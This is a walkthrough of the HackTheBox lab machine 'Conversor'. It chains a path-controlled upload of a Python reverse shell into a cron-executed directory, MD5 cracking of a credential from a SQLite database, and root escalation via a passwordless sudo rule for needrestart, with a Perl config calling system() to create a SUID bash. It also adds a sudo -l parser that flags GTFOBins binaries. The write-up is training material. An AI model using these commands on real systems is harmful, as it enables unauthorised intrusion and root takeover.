Conversor - Easy Linux
HackTheBox Conversor Walkthrough
OVERVIEW
Conversor is a Linux machine hosting a file conversion web application. The attack chain involves dropping a Python reverse shell into a cron-watched scripts directory through an upload whose destination path is client-controlled (XSLT injection is the intended alternative route but did not work here), cracking an MD5 credential found in a local SQLite database, and escalating privileges by abusing a passwordless sudo rule for needrestart, whose config file is evaluated as Perl.
STEP 1 RECONNAISSANCE
Starting with an nmap scan:
sudo nmap -sC -sV 10.129.28.198
Two ports are open: SSH on 22 and HTTP on 80. The HTTP service immediately redirects to conversor.htb, so the first thing to do is add that to /etc/hosts:
echo "10.129.28.198 conversor.htb" | sudo tee -a /etc/hosts
STEP 2 WEB APPLICATION ENUMERATION
Navigating to http://conversor.htb shows a file conversion web app. Registration is open, so create an account and log in.
Digging into the page source reveals two critical things. First, there is no validation of uploaded files: neither the file content nor the destination path sent in the upload request is checked. Second, an install.md file referenced in the source discloses that the server runs a cron job every minute that executes any Python scripts placed in /var/www/conversor.htb/scripts/. Together these are the path to remote code execution: write a Python file into that directory and wait for cron.
STEP 3 INITIAL ACCESS
The application processes XSLT files. XSLT injection via the EXSLT extension (exsl:document, which writes the transform output to an arbitrary path) can in theory be used to write files to the filesystem; see PayloadsAllTheThings for reference payloads. In practice, attempting this returned nginx errors, so the cleaner approach was to use Caido to intercept the file upload request and manually set the destination path to /var/www/conversor.htb/scripts/shell.py. The server trusts that path as-is, which is the actual vulnerability exploited here.
The uploaded file is a standard Python reverse shell pointing back to your attack machine. Set up a listener with Penelope before the cron fires:
penelope -p 4444
Wait up to one minute. The cron job picks up the script and executes it, landing a shell as www-data.
STEP 4 CREDENTIAL EXTRACTION
Enumerating the filesystem as www-data turns up a file called user.db. It is a SQLite3 database containing a user table with an MD5 hash for an account named fismathack.
Copy the hash to your machine and crack it with John:
./john --format=raw-md5 --wordlist=/path/to/rockyou.txt hash.txt
John cracks it in under two seconds:
Keepmesafeandwarm (fismathack)
STEP 5 LATERAL MOVEMENT
Switch to fismathack with the cracked password:
su fismathack
Grab the user flag from the home directory.
STEP 6 PRIVILEGE ESCALATION
Checking sudo privileges:
sudo -l
Output shows fismathack can run /usr/sbin/needrestart as root with no password. needrestart has a known sudo privesc documented on GTFOBins: its -c flag takes a custom config file, and needrestart's config format is Perl source that is evaluated when loaded, so a config containing a system() call runs that command as root. This is a sudo misconfiguration rather than a bug in needrestart itself.
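Reading sudo -l output by eye is fine on one box, but the check worth automating is "which of these rules are NOPASSWD, and which binaries have a sudo entry on GTFOBins". The following is an added helper, not part of the walkthrough: it parses sudo -l output into rules and flags the binaries present in a small, deliberately partial list of GTFOBins sudo entries. The sample output is constructed in the shape sudo prints on Debian/Ubuntu (the vim rule is added to show a password-required entry next to the NOPASSWD one); the walkthrough only reports that needrestart is runnable as root without a password.

```python
import os
import re

# Constructed sudo -l output, not the real output from the box. The vim rule is
# made up to contrast a password-required entry with the NOPASSWD one.
SAMPLE_SUDO_L = """\
Matching Defaults entries for fismathack on conversor:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User fismathack may run the following commands on conversor:
    (ALL) NOPASSWD: /usr/sbin/needrestart
    (ALL : ALL) /usr/bin/vim
"""

# Partial list of binaries that have a "sudo" technique on GTFOBins; extend it.
GTFOBINS_SUDO = {"needrestart", "vim", "vi", "find", "less", "more", "python3", "perl", "env"}

# "(runas) TAG: TAG: /path/to/cmd args" -- tags such as NOPASSWD: or SETENV: are optional.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$")


def parse_sudo_l(text: str) -> list:
    """Return one dict per command rule found after the 'may run' header."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        # sudo prints several commands on one line separated by ", "
        for cmd in m.group("cmd").split(", "):
            rules.append({
                "runas": m.group("runas").strip(),
                "nopasswd": "NOPASSWD" in tags,
                "command": cmd.strip(),
            })
    return rules


def gtfobins_candidates(rules: list) -> list:
    """Flag rules whose binary (basename of the first token) is in GTFOBINS_SUDO."""
    hits = []
    for rule in rules:
        binary = os.path.basename(rule["command"].split()[0])
        if binary in GTFOBINS_SUDO:
            hits.append({**rule, "binary": binary})
    return hits


if __name__ == "__main__":
    for hit in gtfobins_candidates(parse_sudo_l(SAMPLE_SUDO_L)):
        tag = "NOPASSWD" if hit["nopasswd"] else "password required"
        print(f"{hit['command']} as ({hit['runas']}) [{tag}] -> see GTFOBins '{hit['binary']}'")
```

On a live box, feed it the real output (for example subprocess.run(["sudo", "-l"], capture_output=True, text=True).stdout). A NOPASSWD hit on a GTFOBins binary is the case here; a password-required hit is still useful once you hold the user's password, as this chain does.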
Create the malicious config:
echo 'system("cp /bin/bash /tmp/poc; chmod u+s /tmp/poc")' > /tmp/cmd.conf
Run it:
sudo /usr/sbin/needrestart -c /tmp/cmd.conf
This drops a root-owned SUID copy of bash in /tmp. Run it with -p so bash keeps the effective root UID instead of dropping privileges on startup:
/tmp/poc -p
Root. Grab the flag from /root/root.txt.
ATTACK CHAIN SUMMARY
Nmap reveals conversor.htb → web app has no upload validation and a cron job runs every Python script in a scripts directory → intercept the upload with Caido and rewrite the destination path to drop a Python reverse shell there → cron executes it → www-data shell → SQLite DB contains an unsalted MD5 hash → John cracks it → su to fismathack → sudo needrestart -c with a Perl config calling system() → SUID bash → root.